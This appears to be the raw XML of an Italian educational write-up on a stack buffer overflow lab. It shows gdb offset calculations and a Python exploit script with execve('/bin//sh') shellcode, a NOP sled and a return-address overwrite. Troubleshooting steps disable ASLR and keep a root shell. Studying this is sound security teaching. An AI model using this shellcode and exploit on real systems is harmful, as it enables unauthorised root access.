          <w:p w14:paraId="3FF569FD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25CA57D9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) p &amp;buffer </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40A477BC" w14:textId="08B86A15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$2 = (char (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*)[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100]) 0xbfffea8c </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06E7E13C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2A2705D5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) p/d 0xbfffeaf8 - 0xbfffea8c </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="745CE18F" w14:textId="5E98E21B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$3 = 108 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 quit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48620B6B" w14:textId="4E647572" w:rsidR="008B70F6" w:rsidRPr="00A22DD2" w:rsidRDefault="008B70F6" w:rsidP="00711920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</w:pPr>
    </w:p>
    <w:p w14:paraId="2D03BB80" w14:textId="26ECF207" w:rsidR="008B70F6" w:rsidRPr="00662326" w:rsidRDefault="00662326" w:rsidP="00662326">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/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</w:pPr>
      <w:r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 xml:space="preserve">e) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93A64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>Generare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93A64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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93A64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>l’input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E93A64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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E93A64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>malizioso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70F6" w:rsidRPr="00A22DD2" w14:paraId="08228450" w14:textId="77777777" w:rsidTr="00281380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3D2AAC" w14:textId="47EA3120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#! /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usr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/bin/python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E6B7F0C" w14:textId="5834EFDB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import sys</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0ECECEF4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DCC9D5B" w14:textId="029AFC54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shellcode= ( </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C2D2504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</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">"\x31\xc0" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B52EF33" w14:textId="55BF53B5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</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>"\x50</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r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        </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>"\x68"</w:t>
            </w:r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r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>"//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"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t xml:space="preserve">        "\x68"</w:t>
            </w:r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r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>"/bin"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F64AA29" w14:textId="749E7B85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"\x89\xe3" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15EAB400" w14:textId="7EF58DA1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"\x50" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29CB7389" w14:textId="2D47647B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"\x53"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B45D899" w14:textId="26E69A6D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"\x89\xe1"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="364630E1" w14:textId="77BF15F8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"\x99" </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C62A240" w14:textId="78BACB25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"\xb0\x0b"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72A23802" w14:textId="3110349E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xcd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\x80"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="346D8002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).encode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(’latin-1’</w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r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</w:p>
          <w:p w14:paraId="6357823C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12415092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content =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bytearray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0x90 for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i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in range(300)) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="585052FC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0981BF3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start = 300 -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len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(shellcode) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D309F0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content[start:] = shellcode </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CB8E65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768310DA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ret = 0xbfffeaf8 + 120 </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3476BC" w14:textId="6704F28D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content[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112:116] = (ret).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to_bytes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(4,byteorder=’little’) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43DA0B46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75A5CF86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with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open(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’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’, ’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wb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’) as f: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CC762B4" w14:textId="0BA1B476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lastRenderedPageBreak/>
              <w:t xml:space="preserve">       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f.write</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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(content)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1491381E" w14:textId="2222A4FA" w:rsidR="006651EA" w:rsidRPr="00A22DD2" w:rsidRDefault="006651EA" w:rsidP="00711920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</w:pPr>
    </w:p>
    <w:p w14:paraId="261FC8A3" w14:textId="59467F9C" w:rsidR="006651EA" w:rsidRPr="00662326" w:rsidRDefault="00662326" w:rsidP="00662326">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662326">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">f) </w:t>
      </w:r>
      <w:r w:rsidR="00E93A64" w:rsidRPr="00662326">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="3"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>Eseguire il programma vulnerabile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0081" w:rsidRPr="00A22DD2" w14:paraId="44B09754" w14:textId="77777777" w:rsidTr="00281380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654DEFE" w14:textId="3DC52464" w:rsidR="00B10081" w:rsidRPr="00A22DD2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chmod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u+x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exploit.py </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F11F076" w14:textId="77777777" w:rsidR="00B10081" w:rsidRPr="00A22DD2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8CF9404" w14:textId="7E42BA6D" w:rsidR="00B10081" w:rsidRPr="00A22DD2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rm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$ exploit.py </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60F6E673" w14:textId="77777777" w:rsidR="00B10081" w:rsidRPr="00A22DD2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4FBA99F1" w14:textId="30BE5EC7" w:rsidR="00B10081" w:rsidRPr="00A22DD2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$ .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/stack </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D80EBBE" w14:textId="77777777" w:rsidR="00653DAA" w:rsidRPr="00A22DD2" w:rsidRDefault="00653DAA" w:rsidP="00653DAA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</w:pPr>
    </w:p>
    <w:p w14:paraId="1C815881" w14:textId="0D1BCE2A" w:rsidR="006651EA" w:rsidRPr="00662326" w:rsidRDefault="00662326" w:rsidP="00653DAA">
      <w:pPr>
        <w:spacing w:line="276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 xml:space="preserve">g) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00132429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>Risoluzione</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00132429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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00132429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>problemi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00132429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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407E03BE" w14:textId="7F6A50D3" w:rsidR="006651EA" w:rsidRPr="00A22DD2" w:rsidRDefault="006651EA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CABBCA5" w14:textId="29C86077" w:rsidR="000A1788" w:rsidRPr="00A22DD2" w:rsidRDefault="000A1788" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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 xml:space="preserve">Se il programma funziona correttamente la shell di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comand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non è ROOT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5470D38C" w14:textId="488AC74F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1788" w:rsidRPr="00A22DD2" w14:paraId="1F1C7EBC" w14:textId="77777777" w:rsidTr="00281380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ACF55D5" w14:textId="2A58A1D9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change "\x68""//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" to "\x68""/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zsh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"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5641C7EF" w14:textId="349FECDC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764E8B96" w14:textId="6D6555D1" w:rsidR="000A1788" w:rsidRPr="00A22DD2" w:rsidRDefault="000A1788" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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>Se in modalità ‘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gdb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>’ funziona ma nella shell normale no:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A2138" w14:textId="77777777" w:rsidR="000A1788" w:rsidRPr="00A22DD2" w:rsidRDefault="000A1788" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman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1788" w:rsidRPr="00A22DD2" w14:paraId="147BDAE1" w14:textId="77777777" w:rsidTr="00281380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6E51EDA" w14:textId="74C4D25E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  <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">sudo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sysctl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 xml:space="preserve"> -w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kernel.randomize</w:t>
            </w:r>
            <w:proofErr w:type="gram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_va_space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=0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC751BD" w14:textId="77777777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</w:p>
          <w:p w14:paraId="5EDD6616" w14:textId="2297A796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</w:p>
          <w:p w14:paraId="2F04FCDC" w14:textId="77777777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6EA25279" w14:textId="77777777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unset env LINES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6442EF28" w14:textId="77777777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unset env COLUMNS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E678590" w14:textId="323C1B03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4017DC34" w14:textId="77777777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5D37E614" w14:textId="710FC78A" w:rsidR="000A1788" w:rsidRPr="00A22DD2" w:rsidRDefault="000A1788" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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>Se la console ritorna “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Illegal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instruction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>” oppure “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Segmentation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Fault”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691EA161" w14:textId="715F5F5F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72DAAD0E" w14:textId="39A4BC6E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 xml:space="preserve">Controllare se il Return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Address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dello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è cambiato, quindi controllare</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> se </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>“addr1”</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> è uguale a quello nel file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Py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exploit.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Se è diverso, aggiornarlo e rieseguire il file exploit.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB29878" w14:textId="0079D951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1788" w:rsidRPr="00A22DD2" w14:paraId="66220420" w14:textId="77777777" w:rsidTr="00281380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4236638" w14:textId="7FDDA492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stack_dbg</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="74FF625B" w14:textId="77777777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6D155ADE" w14:textId="20F4A4AC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) </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>b foo</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="674BDF65" w14:textId="0997AD88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 run</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64C6237E" w14:textId="1AE8EC9C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) </w:t>
            </w:r>
            <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>p $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  <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>ebp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="214EC681" w14:textId="067ED902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  <w:r w:rsidRPr="00A22DD2">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:lang w:val="it-IT"/>
              </w:rPr>
              <w:t xml:space="preserve">---&gt; addr1: </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="08154D21" w14:textId="77777777" w:rsidR="0019599A" w:rsidRPr="00A22DD2" w:rsidRDefault="0019599A" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0148252F" w14:textId="77777777" w:rsidR="000A1788" w:rsidRPr="00A22DD2" w:rsidRDefault="000A1788" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A22DD2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="343CA4D5" w14:textId="4E2EE7F3" w:rsidR="0019599A" w:rsidRDefault="00566756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5) </w:t>
      </w:r>
      <w:r w:rsidR="000A1788" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Referenze</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> e Tutorial utili</w:t>
      </w:r>
      <w:r w:rsidR="000A1788" w:rsidRPr="00711920">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78852DB1" w14:textId="77777777" w:rsidR="00566756" w:rsidRPr="00566756" w:rsidRDefault="00566756" w:rsidP="00566756"/>
    <w:p w14:paraId="5F7C22DA" w14:textId="7FDFFE2F" w:rsidR="001E7606" w:rsidRDefault="00735E1B" w:rsidP="001E7606">
      <w:pPr>
        <w:pStyle w:val="Standard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proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Git</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Repository </w:t>
      </w:r>
      <w:r w:rsidR="00C74A3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">con il codice </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">sorgente </w:t>
      </w:r>
      <w:r w:rsidR="0086563F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>implementato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> in questo progetto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335F48C5" w14:textId="01E56E8E" w:rsidR="001E7606" w:rsidRDefault="001E7606" w:rsidP="001E7606">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="001E7606">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://github.com/Sprea22/Buffer-Overflow-Attack</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59CEEF7D" w14:textId="77777777" w:rsidR="001E7606" w:rsidRPr="001E7606" w:rsidRDefault="001E7606" w:rsidP="001E7606">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B3F3E17" w14:textId="7A7D5CFC" w:rsidR="00566756" w:rsidRDefault="00566756" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard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 xml:space="preserve">Introduzione ben dettagliata su Buffer Overflow con esempio pratico su </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Ubuntu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> 16.04</w:t>
      </w:r>
      <w:r w:rsidR="00735E1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00394F63" w:rsidRPr="00E3404B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://www.handsonsecurity.net/files/chapters/buffer_overflow.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4B555" w14:textId="77777777" w:rsidR="008C447D" w:rsidRDefault="008C447D" w:rsidP="008C447D">
      <w:pPr>
        <w:pStyle w:val="Standard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566756">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Video in cui </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>viene spiegato in maniera molto chiara il concetto di BO e un esempio pratico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD67C1" w14:textId="77777777" w:rsidR="008C447D" w:rsidRDefault="008C447D" w:rsidP="008C447D">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E3404B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=1S0aBV-Waeo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5609D31C" w14:textId="77777777" w:rsidR="008C447D" w:rsidRPr="00566756" w:rsidRDefault="008C447D" w:rsidP="008C447D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58D17BB1" w14:textId="47CB9AEE" w:rsidR="00566756" w:rsidRDefault="005C2583" w:rsidP="00711920">
      <w:pPr>
        <w:pStyle w:val="Standard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>Esempio pratico di BO Attack su Linux 16.04</w:t>
      </w:r>
      <w:r w:rsidR="00566756" w:rsidRPr="00566756">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00566756" w:rsidRPr="00E3404B">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:lang w:val="it-IT"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=hJ8IwyhqzD4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="76AC4CAC" w14:textId="77777777" w:rsidR="00566756" w:rsidRPr="00566756" w:rsidRDefault="00566756" w:rsidP="00566756">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EBBDBC4" w14:textId="77777777" w:rsidR="00566756" w:rsidRPr="00566756" w:rsidRDefault="00566756" w:rsidP="00566756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0AF6A4F2" w14:textId="77777777" w:rsidR="000A34C1" w:rsidRPr="00566756" w:rsidRDefault="000A34C1" w:rsidP="00711920">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000A34C1" w:rsidRPr="0056675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3864"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11403E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2927"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D58AB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443A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C24F932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DCF4A2B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3A6A4B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E40C5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15BAF8F4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15C2723"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="354634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A37A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A1053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F21C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6D8AAB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60782"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6C4C38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72112"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CEBA3B44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01A5D3C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="21CE4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C5B04"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E92E2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46138"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C406D0C0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12"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="6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AE"/>
    <w:rsid w:val="000500D2"/>
    <w:rsid w:val="000934F1"/>
    <w:rsid w:val="000A1788"/>
    <w:rsid w:val="000A34C1"/>
